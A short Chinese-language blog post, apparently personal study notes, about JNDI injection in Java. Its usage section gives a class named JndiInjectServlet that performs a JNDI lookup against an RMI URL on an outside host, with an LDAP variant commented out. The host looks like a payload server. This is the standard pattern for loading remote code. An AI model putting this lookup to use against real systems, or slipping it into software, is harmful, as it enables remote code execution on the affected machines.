jndi

Jndi

简介

img

使用

1
2
3
4
5
6
7
8
public class JndiInjectServlet {
public static void main(String[] args) throws NamingException {
InitialContext initialContext=new InitialContext();
// initialContext.lookup("ldap://198.19.249.35:1389/c2cks7");
initialContext.lookup("rmi://198.19.249.35:1099/c2cks7");
}
}


jndi
https://tsy244.github.io/2025/05/12/javaee/jndi/
Author
August Rosenberg
Posted on
May 12, 2025
Licensed under